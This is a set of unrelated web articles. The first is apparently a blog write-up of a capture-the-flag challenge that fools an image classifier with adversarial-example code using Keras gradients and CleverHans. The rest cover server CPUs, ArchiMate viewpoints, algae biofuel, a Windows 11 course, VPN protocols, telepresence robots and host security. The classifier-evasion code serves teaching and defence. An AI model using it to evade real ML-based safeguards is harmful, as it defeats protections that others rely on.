gradient_function = K.gradients(cost_function, input_layer)[0]

get_cost_and_gradients = K.function([input_layer, K.learning_phase()],
                                    [cost_function, gradient_function])

Here, object_type_to_fake is the class number of what we want to fake. Now, according to the formula in Figure 3 above, we should repeatedly add a small fraction of the sign of the gradient until we achieve the result. The result should be that the confidence in the prediction of the target class becomes at least 95%:

confidence = 0.0
while confidence < 0.95:
    confidence, gradient = get_cost_and_gradients([adversarial_image, 0])
    adversarial_image += 0.007 * np.sign(gradient)

However, this procedure takes way too long without a GPU; a few hours, according to Geitgey. For the CTFer and the more practical-minded reader, there is a library that implements this and other attacks on machine learning systems to determine their vulnerability to adversarial examples: CleverHans. Using this library, we change the expensive while loop above to two steps: make an instance of the attack method and then ask it to generate the adversarial example.

from cleverhans.attacks import MomentumIterativeMethod

# The raw Keras model may need wrapping (e.g. KerasModelWrapper) in some CleverHans versions
method = MomentumIterativeMethod(model, sess=K.get_session())
# target: one-hot label of the class we want (the tree frog)
test = method.generate_np(adversarial_image, eps=0.3, eps_iter=0.06, nb_iter=10, y_target=target)

In this case, we used a different attack, namely the MomentumIterativeMethod, because in this situation it gives better results than the FastGradientMethod, which is obviously also a part of CleverHans. And so we obtain our adversarial example.
Figure 5. Adversarial image for the challenge.
You can almost see the tree frog lurking in the back, if you imagine the two knobs on the cabinet are its eyes. Just kidding. Upload it to the challenge site and, instead of getting the predictions, we get the flag. Not just that: the model is 99.99974% certain that this is a tree frog. However, the difference between it and the original image, according to the widely used perceptual hash algorithm, is less than two bits. Still, the adversarial example has artifacts, at least to a human observer. What is worse is that these issues persist across different models as long as the training data is similar. That means that we could probably pass the same image to a different animal image classifier and still get the same results.
Ultimately, we should think twice before deploying machine-learning-based measures. This is, of course, a mock example, but in more critical situations, having models that are not resistant to adversarial examples could have catastrophic effects. Apparently, the reason behind this is the linearity of the functions hidden in these networks. So switching to a more non-linear model, such as an RBF network, could solve the problem. Another workaround could be to train the model on data that includes adversarial examples. To borrow a phrase from carpenters, "Measure twice, cut once." We should also remember that, whatever the solution, one should test twice and deploy once.
Ready to try Continuous Hacking? Discover the benefits of our comprehensive Continuous Hacking solution, which hundreds of organizations are already enjoying.
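If you want to check the "perceptually indistinguishable" claim yourself, the perceptual hash mentioned above is easy to reproduce. Here is a small sketch using the Python imagehash package; the package choice and the file names are our own assumptions, since the post does not say which implementation was used.

from PIL import Image
import imagehash

original = imagehash.phash(Image.open("malinois.png"))
adversarial = imagehash.phash(Image.open("malinois_adversarial.png"))

# Subtracting two hashes gives the Hamming distance in bits
print(f"perceptual hash difference: {original - adversarial} bits")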
<urn:uuid:73fa9ff4-acc0-4a60-b3b6-2918631532f6>
CC-MAIN-2022-40
https://fluidattacks.com/blog/fool-machine/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00269.warc.gz
en
0.912944
1,620
2.859375
3
How To Choose The Best Processor For Your Server
In today's ever-evolving tech space, one thing seems to be certain. Our dependence on technology to support critical IT operations, home-lab setups, or any other server application simply isn't going anywhere anytime soon. In fact, it seems to be accelerating! As new computing platforms, apps, and servers are released on a seemingly daily basis, it makes one wonder whether they are picking the right server and server specs to perform today and far into the future.
At the core of this exponential growth in computing power is the processor, also known as the CPU or Central Processing Unit. The CPU is the engine driving all of the sophisticated processing behind home servers, applications, virtual machines, and the like. Each year, we see a plethora of processors released that deliver cutting-edge specs, making last year's predecessor look like a dinosaur. That makes deciding on a processor even more challenging. To help support that decision process, and to clear up any misconceptions before making the plunge into a new CPU purchase, it's best to outline what specifications to look for in a server processor, understand how those specifications influence the greater computer ecosystem, and understand which processor might be the right fit based on your tech needs. Of course, this is a critical decision: the CPU acts as the foundation of your computing platform, the engine that drives its computing capabilities and either allows or prevents you from performing the key operations you are looking for in your server.
A Quick Overview of the Server Processor
When looking at purchasing the right processor for your server, there are some key specifications to consider: clock speed, cores, threads, and cache. As a high-level overview, let's give a brief rundown of each spec before covering other processor considerations.
Clock Speed. Clock speed is a critical processor specification. Measured in gigahertz (GHz), clock speed denotes how quickly your processor can complete computing calculations. The higher the clock speed, the faster applications will run, thus allowing you to run more complex applications.
Cores. Processor cores are individual processing units within the multi-core central processing unit. These cores are what actually handle the individual processing tasks. Traditionally, each core processes computing operations in a serialized manner, so a multi-core processor – the most common implementation today – allows the processor to handle multiple computing instructions in parallel.
Threads. Threads can be thought of as the number of independent streams of work a chip can handle at once. Not to be confused with cores, which are the physical processing units in a chip that carry out computing processes, threads are virtual components that manage tasks at the software level. Importantly, a single core can run multiple threads, allowing more virtual processes to happen in parallel and thus improving the computing capabilities of the physical chip.
Cache. The cache is a fast-access memory area that enables quicker data retrieval than the standard process in which the processor retrieves data from RAM. There are three types of cache that serve varying functions.
L1. Usually part of the chip itself and the fastest cache type.
L2. Larger than L1 cache but also slower.
L3.
The largest cache type, but slower than the two above.
Specifications of a Server Processor
Now, the two major competitors (and other chip manufacturers in the space) release a series of chips, packed with different specs such as processor cores, cache size, clock speed, threads, etc. Today, processors can still be broken down into the following categories:
Entry Level. SMB-ready, perfect for smaller VM footprints, home labs, and enthusiasts.
Mid-Level. More suited for mid-range organizations and well-tailored for solutions that require decent computing capabilities.
Enterprise Level. Top-of-the-line processors suited for today's most computationally intensive applications like AI/ML/crypto mining.
Both companies (AMD and Intel) now offer several lines of processors that differ in:
- Number of cores
- Host bus speed
- Various other characteristics and special features supported
To drill down on which specific processor is going to be the right fit for your unique use case, it's best to start by outlining the scope of your project. Ask yourself the following questions. What will you be using this server for? Will it be for a PlexLab? Are you running virtual machines? If so, how many? Will you be doing any crypto mining or other computationally intensive processes? In the latter instance, although crypto mining is traditionally GPU-intensive, it still requires substantial CPU resources. Once you've outlined what's important in the short term, it's important to outline how your project scope may change over the next one, three, or five years.
After you've built a strong outline of both of these use cases, our suggestion is to simply match the spec requirements for your project against the processor you're considering purchasing. You'll want to compare the clock speed, number of cores, and cache of the given processor against the suggested specs for the given project. Keep in mind that servers are always evolving. If you start with one processor today and need to upgrade your server down the road, you always have that as an easy option.
If you're interested in continuing to skill up on IT topics through certifications or online courses, be sure to check out our CBT Nuggets certification training. We offer a wide variety of IT certification courses to help you grow your IT expertise!
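If you want to see how the specifications discussed above show up on a machine you already have, here is a small Python sketch using the psutil package (os.cpu_count alone would also work for counting logical processors). The values printed depend entirely on your hardware.

import os
import psutil

physical = psutil.cpu_count(logical=False)   # physical cores
logical = psutil.cpu_count(logical=True)     # hardware threads
freq = psutil.cpu_freq()                     # MHz; may be None on some platforms

print(f"Physical cores:  {physical}")
print(f"Logical threads: {logical}")
if freq:
    print(f"Max clock speed: {freq.max / 1000:.2f} GHz")
print(f"os.cpu_count():  {os.cpu_count()}")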
<urn:uuid:a521b253-aeeb-405c-b71f-d9261d42bece>
CC-MAIN-2022-40
https://www.cbtnuggets.com/blog/technology/system-admin/how-to-choose-the-best-processor-for-your-server
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00269.warc.gz
en
0.924437
1,145
2.796875
3
In my previous blog post (https://bizzdesign.com/blog/a-pattern-for-sizing-archimate-diagrams) I described why it is useful to reduce complexity when creating architecture diagrams. It supports the architect by guiding the creation of diagrams and it supports the reader by not creating overly complex diagrams (too many different types of concepts). Each viewpoint addresses a specific concern, e.g. a capability map to show what the capabilities of a company are. In this blog I will focus on the application layer to provide practical examples using the viewpoint creation pattern described in the previous blog post. The examples are quite generic. They are meant to be used as a starting point for professionals looking to learn more on the subject so they appeal to a large audience. Structural relationships model the static construction or composition of concepts of the same or different types. The application components viewpoint can be set up to show the hierarchy of application components, their application services and which requirements are realized by the application (components) or their services. You can use it to create diagrams that simply show the components of an application. In this case, it supports you to add new elements to your model in a guided way. You can also show the requirements a new application (service) shall fulfill. The focus of this viewpoint is on one application, not on the dependencies or support for other application components. It is similar to the application structure viewpoint mentioned in the ArchiMate standard, but more restrictive, focusing on the hierarchical structure of one application and showing which requirements the new application shall realize. Compared to the whole ArchiMate standard, which includes 59 concepts and 13 relation types, this viewpoint only allows the creation of 3 different concepts and 2 different relationship types. This makes it even less complex than a BPMN process viewpoint. An example of the application components view is shown below. On the right-hand side, I made use of graphical nesting based on the composition relation to show an alternative graphical representation. Dependency relationships model how elements are used to support other elements. Employing the viewpoint creation pattern in this case will allow for the creation of dependency viewpoints at the level of serving and access relationships. The dependencies between applications are often shown in application communication (TOGAF) or application cooperation (ArchiMate) views. Bottom line, they show what the cooperation between applications looks like. It can be expressed in a static way by showing the application services (what the application component does) and the data accessed. The example below shows that the Payroll Service is accessing (reading) the Employee Data when serving the SAP Finance application component. Dynamic relationships model behavioral dependencies between elements. The two relationship types are flow and triggering. Often, triggering is used between processes, while at the application layer we often see flow being used between application components. As an alternative to the viewpoint explained above, you can use the flow relationship to create an application cooperation diagram in a slightly different way. By not using the application service you hide information, but this can be an advantage when you want to show an end-to-end data flow for one data object across your application landscape. 
These diagrams can involve a lot of applications, so by not showing which services access which data, the diagram remains less complex. In the example below, we also make use of the association relationship, depicted as interacting with the flow relationship (allowed since ArchiMate 3). Let’s recap. I applied the pattern described in my previous blog post to create ArchiMate viewpoints at the application layer. The pattern is very helpful to decide which elements and relationships are allowed in which diagram. Without such a pattern, for every constellation of concepts and relationships you will find a justification why they should be allowed in one viewpoint but not in another. So, this saves time when discussing which types of diagrams must be created in a standard way for projects. These viewpoints also implicitly provide an order for creating elements at relationships. Often it is useful first to show the components and/or services of a new application and why it is needed. Stating why a new application or a new service is needed supports you in ‘selling’ your architecture, for example in a presentation to management. While creating this view, you add new information to your repository in a guided way. The application cooperation views then show the context of your new application – where they impact the existing application landscape. A useful addition to an application cooperation viewpoint is to show which technology interface is used (e.g. REST API, FTP etc.). Especially in the dynamic application cooperation viewpoint, with the flow relationship, you should think of a convention governing how many flow relationships you allow between applications. Adding one flow relationship for each data object gives you the option to add properties like exchange frequency, push/pull of data, but can also lead to very cluttered diagrams. An alternative is to only create one flow relationship per technology interface. For the big picture, this might be good enough to guide the architecture development. As a complementary diagram for more detailed solution design in projects, you might want to use UML sequence diagrams that show in detail the data flows from one application to another (including confirmation messages that are important for solution design but not at a higher architecture level). And of course, you don´t want to clutter your diagram by adding all concepts and relationships. Instead you can use coloring and labeling to show information from the architecture model – see example below. The summarizing table below shows the three viewpoints presented above. You might want to create additional application layer viewpoints – for example, for logical architectures, by using the application function instead of the application component concept. Feel free to try out this viewpoint creation pattern yourself, it is a strong and useful guidance! In the next blog, I will show the usage of this viewpoint creation pattern to either the business or the technology layer. So stay tuned and until then, please take a look at a recent blog from Marc Lankhorst in which he positions architectural designs as one of three goals when communicating change to your stakeholders: https://bizzdesign.com/blog/communicating-architecture-with-stakeholders
<urn:uuid:ca0610da-580e-43e7-a243-4785b6a43078>
CC-MAIN-2022-40
https://bizzdesign.com/blog/practical-archimate-viewpoints-for-the-application-layer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.92913
1,259
2.59375
3
MSU scientists have a new proof of concept for a biofuel production platform that uses two species of marine algae and soil fungi. It lowers cultivation and harvesting costs and increases productivity, factors that currently hold back biofuels from being widely adopted. The species of alga, Nannochloropsis oceanica, and fungus, Mortierella elongata, both produce oils that we can harvest for human use. With these oils, we could make products like biofuels to power our cars or omega-3 fatty acids that are good for heart health. When scientists place the two organisms in the same environment, the tiny algae attach to the fungi to form big masses that are visible to the naked eye. This aggregation method is called bio-flocculation. When harvested together, the organisms yield more oil than if they were cultivated and harvested each on their own. “We used natural organisms with high affinity for each other,” says Zhi-Yan (Rock) Du, the study’s first author. “The algae are very productive, and the fungus we use is neither toxic to us nor edible. It’s a very common soil fungus that can be found in your back yard.” Other advantages reported by the researchers: - The system is sustainable, since it doesn’t rely on fossil fuels. The fungi grow on sewage or food waste, while the algae grow in sea water. - It is cheaper to harvest, as the big masses of algae and fungi are easily captured with simple tools, like a piece of mesh. - The method is potentially easier to scale, as the organisms are wild strains that have not been genetically modified. They pose no risks of infecting any environment they come in contact with. Solving problems that hamper biofuel production Bio-flocculation is a relatively new approach. Biofuels systems tend to rely on one species, such as algae, but they are held back by productivity and cost problems. First, systems that only rely on algae suffer from low oil productivity. “Algae can produce high amounts of oil when their growth is hindered by environmental stresses, such as nitrogen starvation. The popular method in the lab for algae oil is to grow the cells to high density levels and then starve them by separating them from the nutrients with centrifugation and several washing methods,” Du says. “This approach involves a lot of steps, time, and labor, and is not practical for industrial scale production.” The new approach feeds the algae with ammonium, one source of nitrogen that algae can quickly use for growth. However, the ammonium supply is controlled so the algae produce the maximum cell density and automatically enter nitrogen starvation. The closely monitored nitrogen diet can increase oil production and lower costs. The second problem is the high cost of harvesting oil, because algae are tiny and hard to collect. Harvesting can take up to 50% of oil production costs. “With bio-flocculation, the aggregates of fungi and algae are easy to harvest with simple and cheap tools,” Du says. Looking forward, the scientists want to mass produce biofuels with this system. They also know the entire genomes of both organisms and could use genetic engineering tools to further improve the method. The study was conducted in the labs of Christoph Benning and Gregory Bonito. It is published in the journal Biotechnology for Biofuels. Provided by Michigan State University
<urn:uuid:ff34a17c-d7cd-4b9f-b67a-bb19f55c1b10>
CC-MAIN-2022-40
https://debuglies.com/2018/09/13/msu-scientists-have-a-new-proof-of-concept-for-a-biofuel-production-platform-that-uses-two-species-of-marine-algae-and-soil-fungi/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.949188
724
3.5625
4
Whether you're new to computers or have used them in the past, this class will help you become more comfortable using Windows® 11 by familiarizing you with the Windows 11 user interface and its basic capabilities. In this course, you will explore Windows 11 and learn how to work with locally installed apps and cloud-based apps, browse the Internet, and manage basic Windows 11 settings. Who should attend This course is designed for end users who are familiar with computers and who need to use the features and functionality of the Windows 11 operating system. To ensure your success in this course, you should have some experience using a personal computer, desktop apps, and the Internet. After completing this course, students will be able to: - Access Windows 11. - Access locally installed apps. - Access cloud-based apps and content. - Manage files and folders. - Configure the Windows 11 environment. - Secure your Windows 11 computer. - Use Backup and Recovery Tools. Outline: Using Microsoft Windows 11 (91172) Module 1: Accessing Windows 11 - Log in to Windows 11 - Navigate the Windows 11 Desktop - Use the Start Menu Module 2: Accessing Locally Installed Apps - Use Apps - Multitask with Open Apps - Install Apps Module 3: Accessing Cloud-Based Apps and Content - Browse the Web - Use Cloud-Based Apps Module 4: Managing Files and Folders - Manage Files and Folders with File Explorer - Find Files, Folders, and Apps - Store and Share Files with OneDrive - Manage Removable Storage Devices Module 5: Configuring Windows 11 - Configure Settings - Use Windows System Commands - Manage Printers and Other Devices - Use Accessibility Features - Use Windows Tools Module 6: Securing Your Computer - Manage Passwords and Sign-In Options - Manage Windows Security - Manage Windows Updates - Use Other Security Features Module 7: Using Backup and Recovery Tools - Create Backups - Troubleshoot and Repair Your System
<urn:uuid:4f41fe4c-88d8-4d3f-bc46-db0e67297855>
CC-MAIN-2022-40
https://www.fastlanetraining.ca/course/microsoft-91172
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00269.warc.gz
en
0.778083
473
3.203125
3
What are VPN protocols and why do they matter? The various connection types tend to be confusing to most people, especially since many of them are acronyms that have no meaning by themselves. In this guide, I'd like to explain the different VPN protocols available, help you understand which you should use, and answer the most common questions I get from people.
It's important to note that you don't have to understand VPN protocols in order to use a VPN. In fact, most of the time you won't even see options for connection types until you open up the advanced settings. Most commercial VPNs are very plug-and-play. These advanced settings exist, however, because there are cases where you would want to choose how you connect with your VPN. That's where this guide can help you. Let's dive into the different types of VPN protocols and then discuss how and why you would use them. By the end, you will have the confidence to choose the right connection type and understand how it will benefit you.
Different Types of VPN Protocols
While some VPN services develop their own proprietary protocols, there is a common set of VPN protocols you'll find across the board. Here's a quick list of those that you're most likely to run into.
- PPTP – "Point-to-point tunneling protocol"
- L2TP/IPsec – "Layer 2 tunneling protocol"
- IKEv2/IPsec – "Internet key exchange version 2"
- SSTP – "Secure socket tunneling protocol"
There are others out there (e.g. SoftEther, Lightway), but since they either haven't been widely adopted or are proprietary to a specific company, we won't cover them in detail here. Almost all of the most popular VPN services will give you the option to choose from at least a couple of options from this list.
Simple Explanation of VPN Protocols
Before I go into detail on each of the above connection protocols, here's a quick synopsis of the pros and cons of each:
| Protocol | Pros | Cons |
| OpenVPN | Industry standard: secure, fast, and suitable for all VPN users | Bloated source code |
| Wireguard | Newest, open-source protocol that is faster and more stable than OpenVPN | Relatively new and still under development |
| PPTP | Fast and ideal for streaming; supported on older devices | Least secure protocol; only recommended for advanced users |
| L2TP/IPsec | More secure than PPTP; good in areas where newer protocols like OpenVPN are not supported | Slower than OpenVPN; only recommended for advanced users |
| IKEv2 | Great for mobile devices; more secure than L2TP/IPsec | Not as secure as OpenVPN or Wireguard |
| SSTP | Extremely secure and can bypass firewalls that L2TP can't | Mostly works only on Windows computers |
To dive a bit deeper, here's what you need to know about each individual VPN connection protocol.
1. OpenVPN Connection Protocol
What is OpenVPN? OpenVPN is the industry standard and generally the most recommended protocol used by VPN providers. Part of what makes OpenVPN so popular is the fact that it's open-source technology, unlike a few of the other VPN protocols that were developed by Microsoft. The strengths of OpenVPN include that it is:
- Extremely secure;
- Highly configurable;
- Usable on both TCP and UDP ports while supporting a large number of encryption algorithms and ciphers.
Of course, its time-tested use is also its downfall: the OpenVPN source code has been bloated with so much extra code over the years that it is bulky to install and sometimes slow to use.
When to Use OpenVPN: Use OpenVPN when security is your #1 priority.
In short, if OpenVPN is an option for you, try to use it.

2. WireGuard – Newest Open-Source Protocol

While the rest of the VPN communication standards listed here are at least two decades old, WireGuard was only introduced in the past couple of years. I've already gone into detail about what makes WireGuard different, but the short answer is that it's a much lighter code base that takes advantage of better encryption libraries. What does this mean for you as a user? WireGuard offers:

- Encryption that is equal to or better than OpenVPN;
- The most stable connection of any protocol here (i.e. it can remain connected when you jump between networks);
- The most lightweight and fastest option (in other words, it connects faster and offers faster speeds).

The primary downfall is that it doesn't have decades of use to test for flaws. The code is open source and continuously reviewed, but it's also continuously being improved as bugs or inefficiencies are found.

When to Use WireGuard: Only a select number of VPNs offer WireGuard, but if you have the option, it's worth testing it against OpenVPN to see which works better for you.

3. PPTP – VPN Protocols

PPTP, which stands for Point-to-Point Tunneling Protocol, is among the earliest encryption protocols invented and can run on versions of Windows dating back to 1995. Because PPTP is one of the most common protocols, it is also easy to set up and computationally the fastest of these connection standards. It is therefore recommended for applications where speed matters most, such as streaming video like Netflix over VPN. However, the major downside is that PPTP offers very little security. Keep this in mind.

When to Use PPTP: Use PPTP to stream geoblocked content at high speeds with limited buffering.

4. L2TP/IPsec VPN Protocol

L2TP, which stands for Layer 2 Tunneling Protocol, is usually combined with IPsec, or Internet Protocol Security. Sometimes you'll only see it written out as L2TP in your favorite VPN software. L2TP was first proposed as an upgrade to PPTP, though it tends to make a slower connection than PPTP. Notably, L2TP provides no strong encryption on its own, which is why it is always paired with IPsec for end-to-end security. Compared to PPTP, the L2TP protocol offers better security, but it's still not quite as strong as what you'll get with OpenVPN.

When to Use L2TP: Use L2TP if you're having a hard time connecting with OpenVPN or it isn't an option for you.

5. IKEv2/IPsec VPN Protocol

IKEv2, which stands for Internet Key Exchange version 2, was initially developed by Microsoft and Cisco. It's also a relative newcomer compared to most other VPN protocols. Many VPN providers, such as NordVPN, pair IKEv2 with IPsec for additional security. It also has the ability to jump automatically from Wi-Fi to your cellular network without dropping the secure VPN connection, making it a popular option for mobile devices. Unfortunately, the added security and functionality take a noticeable toll on IKEv2's overall speed.

When to Use IKEv2: Use IKEv2 for heavy mobile usage where you need a stable connection when switching networks.

6. SSTP (Windows Only)

SSTP, which stands for Secure Socket Tunneling Protocol, is owned directly by Microsoft. As such, it works mostly on Windows, with some functionality on Linux and Android as well. SSTP is regarded as among the most secure protocols, as it transports traffic through SSL (the Secure Sockets Layer).
It is also less susceptible to blocking by firewalls.

When to Use SSTP: Use SSTP if you run a Windows computer.

How to Choose Which VPN Protocol to Use

So now that you know a little more about the available VPN encryption standards, let's dive into how you might want to use them in your day-to-day life:

- For general VPN users or newbies, you can always count on OpenVPN to guarantee anonymity, security, and the ability to access geo-restricted content.
- For early adopters, WireGuard has proven itself over the past couple of years to be the best new security available and may eventually unseat OpenVPN as the industry standard.
- If online security, anonymity, and privacy are your top priorities for using a VPN, then OpenVPN, WireGuard, or SSTP are the best. With these protocols, you won't ever need to sweat about third parties seeing your IP address, geographic location, or online traffic. Remember that SSTP runs best on Windows devices, so if you have a non-Windows device, OpenVPN or WireGuard still provides all the security you need.
- For those using a VPN primarily for streaming geo-restricted content, such as streaming Disney+ outside the US, try using PPTP or L2TP/IPsec. Remember that these two offer little to no encryption security. So if security isn't essential, you can use PPTP for streaming content, as it is the fastest. For an added layer of security, use L2TP/IPsec, even though it is slower than PPTP. Before settling on these protocols, check streaming performance with OpenVPN first, as PPTP and L2TP/IPsec are known to have major security flaws.
- The best protocols for peer-to-peer downloading/torrenting are OpenVPN and WireGuard, as they are best for anonymity and security. Some may recommend L2TP/IPsec to increase download speeds, but given its security flaws, I would stay away from it when torrenting. It's also important to use a service with a VPN kill switch feature so that if your connection does drop, your torrenting activity isn't exposed.
- On mobile devices, use OpenVPN, WireGuard, or IKEv2. Each allows for easy configuration and connects quickly on mobile devices. IKEv2 is a strong alternative, as it can jump from Wi-Fi networks to your cellular carrier without disconnecting.

FAQ: Connection Protocols for VPNs

The following are the most common questions asked about VPN connection standards.

Which VPN protocol is best? Each VPN protocol serves a different purpose and has different strengths and weaknesses. Therefore, the "best" depends on your use case. For example, proven security points to OpenVPN, while speed and agility might require the newer WireGuard.

Which VPN protocol is fastest? The fastest connection standard is generally considered to be PPTP, which stands for Point-to-Point Tunneling Protocol. It's great for streaming video content, but it's important to note that it doesn't offer a high degree of security.

Which VPN protocol is most secure? OpenVPN and WireGuard are widely considered the most secure options available to most people. Both offer 256-bit encryption and an open-source code base that has been critically reviewed. SSTP is also quite a secure connection, but since it's controlled by Microsoft, it doesn't work on all devices.

Should I switch protocols? In most cases, you shouldn't change the VPN connection protocol often. The best VPN services will automatically choose the fastest connection for you. There are times, however, when you just won't connect. It's also possible that you might want faster speeds, more stability, or greater security.

Some VPNs use what are known as "obfuscated servers" to evade censorship in certain countries.
This isn't a particular protocol so much as a specialized server configuration. It is these kinds of features that are essential if you're looking for the right VPN to use in China.

Final Thoughts | VPN Connection Protocols

Although this list could have been much longer, OpenVPN, WireGuard, PPTP, L2TP, IKEv2, and SSTP are the most common options you'll find. Keep in mind that each VPN provider may add its own touches to the connection standards listed above. Therefore, after choosing which is best for you, review that service provider's website to see whether they have added anything to further bolster security or performance.
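As a recap, here is a toy Python sketch that encodes the selection guidance above into a simple lookup. The priority labels and the function itself are invented purely for illustration; real VPN apps expose protocol choice through their own settings, not through any such API.

```python
# Toy recap of this guide's recommendations. The priority labels are
# invented for illustration; they are not part of any real VPN client.
RECOMMENDATIONS = {
    "security": ["OpenVPN", "WireGuard", "SSTP (Windows only)"],
    "streaming speed": ["PPTP", "L2TP/IPsec"],
    "torrenting": ["OpenVPN", "WireGuard"],
    "mobile": ["OpenVPN", "WireGuard", "IKEv2"],
}

def suggest_protocols(priority: str) -> list[str]:
    """Return protocols in order of preference for a given priority."""
    # The default mirrors the guide's bottom line: prefer OpenVPN if unsure.
    return RECOMMENDATIONS.get(priority, ["OpenVPN", "WireGuard"])

if __name__ == "__main__":
    for p in RECOMMENDATIONS:
        print(f"{p:>16}: {', '.join(suggest_protocols(p))}")
```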
<urn:uuid:5086ca9f-b067-41c1-b5dd-b999836f47a9>
CC-MAIN-2022-40
https://www.allthingssecured.com/vpn/faq/vpn-protocol-guide/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00269.warc.gz
en
0.93131
2,664
2.53125
3
The National Science Foundation (NSF) conducted a study of the preferences of university students and instructors across various class formats. The instructors preferred teaching physical classes, while the 18 students involved in the study were split between remote learning and attending classes in person, NSF said Wednesday.

Despite their own preference for in-person teaching, the instructors noted that most classes favor telepresence robots as distance learning tools. The students added that the robots have the capacity to make them feel more expressive and self-aware in class.

"Research experience for undergraduates has become a big challenge during the ongoing pandemic, and telepresence robots can help not only in education but also in possibilities for undergraduates to hone their research skills through remote participation," said Prabhakaran Balakrishnan, program director at NSF's Division of Information and Intelligent Systems.

A separate study by Oregon State University suggested that telepresence robots allow students to be more engaged with their classes.
<urn:uuid:66306b0b-07f9-4c0a-86dc-50f14557d971>
CC-MAIN-2022-40
https://executivegov.com/2020/06/nsf-study-explores-learning-preferences-of-instructors-students/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00269.warc.gz
en
0.96265
190
2.875
3
Establishing host security is one of the major concerns these days. The reason is that the host itself can be the thing that gets infected, and everything that connects to it is then exposed to risk as well. Here are some ways to get rid of that problem.

The security of the operating system should be everyone's concern: it is the most heavily used layer of the system, and it has settings that must be configured correctly to prevent problems later. Hardening an OS is not easy. One step is installing software that protects the OS and keeps it stable. Here are the main anti-malware categories that should be installed:

Antivirus: helps keep out the viruses that can attack the computer.
Anti-spam: protects against spam-based attacks.
Anti-spyware: protects against cyber spies.
Pop-up blockers: pop-ups are among the most annoying things on the web, and this software keeps users safe from them.

Patch management is also important here: one should ensure that the patches being applied are compatible and that the installed programs can support them.

Blacklisting an application means that the application should no longer be used. Some applications pose serious threats because they were developed with loopholes or have other problems. Steps should be taken to handle such problems properly: keep those applications blacklisted and block them from running, for example in the browser. Application whitelisting is the opposite procedure, in which only explicitly approved software is allowed to run.

Another thing to keep in mind: the OS used on the host should be a trusted one. The mainstream options (Android, Apple's operating systems, and Microsoft Windows) are backed by far more security research than most alternatives. Think critically and very carefully before installing any other OS on the host, since it might contain flaws and be more vulnerable to attack.

Hosts also run firewalls. It can happen that when we try to connect to a host, the firewall doesn't let us in. That can be a plus when the person trying to connect is unknown, but it is a problem if a known, legitimate person is intentionally being kept out of the system. One can get rid of this problem by simply adding an exception for that person to the firewall.

Another important layer is host-based intrusion detection. Someone may break in at the host itself and try to gain access to data, so appropriate measures should be in place to stop data theft and data loss.

When we talk about security, it is not only software that needs securing. There is hardware too: while hackers usually gain access virtually, someone might also be looking to do physical damage to hardware, which cannot protect itself.
There are many ways to keep hardware in a place where no one else can have access to it, secure from hackers and from anyone who wants to ruin it. Here are the techniques most commonly used:

Cable locks: Cables face threats of their own: someone might simply take them away. Cables can play a really important role; if an Ethernet or USB cable is taken away, it is a big problem, because the function it serves stops entirely while the cable is missing. So it makes sense to lock cables down so that no one can get access to them.

Safe: Hardware is supposed to stay safe, because if it is broken or damaged, externally or internally, it won't work properly and won't deliver the results needed to finish the work. The physical safety of hardware should therefore be part of planning the overall security of the computer.

Locking cabinets: When it comes to hardware security, one can place devices in cabinets and lock them up. These are not the same cabinets we find in a kitchen or bathroom; they are special cabinets with holes so that the heat being generated can get out. If there were no holes, there would be a great chance that the devices kept inside would fry and fail under the heat. So there must be proper arrangements for heat ventilation in the cabinets.

Host software baselining: This also has to do with the host's security. It is an attribute of the host and its software: how secure the host is, and how one can use it while staying secure as well.

Virtualization now addresses some really big challenges in the IT industry. Infrastructure sprawl compels IT departments to channel around 70 percent of their total budgets into maintenance, leaving fewer resources for business-building innovation. The difficulty arises from the architecture commonly followed today, such as x86 computers, which are normally designed to run only one operating system and only one application alongside that OS. The result is that even small data centers have to deploy more and more servers, with each server operating at around 15 percent capacity, which is far too inefficient by any standard.

Virtualization software presents a solution to this problem: it runs many operating systems, each sealed off with its applications, on only one host or physical server. These virtual machines are self-contained, so each can use as many resources as it needs.

Snapshots: One can take snapshots of a virtual machine's state as proof that a process is being carried out properly.

Patch compatibility: Another important point is compatibility of patches. One can't just take any patch and apply it. Take a game as an example.
A patch applies only if the previous version is the right one and the game supports it; if that condition isn't met, the patch won't be applied and you won't get the desired result. The same goes for hosts: for many applications, the patch being applied must be compatible, or it won't work.

Host availability/elasticity: Another important point is that when someone connects over the internet, the host must be available to send back a reply. It is a common experience that the internet connection is in place and our side is working, yet a message says the host server is unavailable or offline. That is the failure point that prevents anyone from really connecting. So make sure the host you choose has elasticity and can stay up all the time, so people can connect to it easily whenever they need to.

Security control testing: Whenever security is at issue, it is understood that tests have to be carried out to ensure all the security controls are working well. Valuable tests can reveal where the system needs help: perhaps an application needs more security, or the existing controls are not enough. In that case, one can think about adding more controls so that the system becomes stronger.

Sandboxing: Sandboxing is a technique that acts as the last line of defense when an exploit happens. It can defend hosts against buggy or otherwise problematic applications. Several OS vendors enforce it, especially Apple, which ensures that programs actively distributed through the Mac App Store are sandboxed, so users become as safe as possible and don't have to face such problems any longer. The sandbox is a virtual barrier: a program is isolated from everything else, and a key property is that the program cannot open the barrier by itself; the developer must explicitly request access for an action to be performed. Without the sandbox enabled, a program has access to the system by default, including documents, networks, and peripherals such as cameras, printers, mice, and calendars.

There are real benefits to the sandbox. For one, it protects programs from each other. If someone builds an application for the OS and that program has no need to access the calendar, then the program accessing the calendar is something to worry about, because a threat is being posed. The problem is worse if the program contains a bug: without a proper sandbox, there is a possibility it gains access to all the other programs, and the calendar, for instance, ends up corrupted.
And if a program is actually hacked, there is surely a risk that the user becomes the victim and the attacker gains full access. For the protection of user data, sandboxing also helps by preventing applications from interfering with each other, which dramatically increases the stability of the applications users rely on.

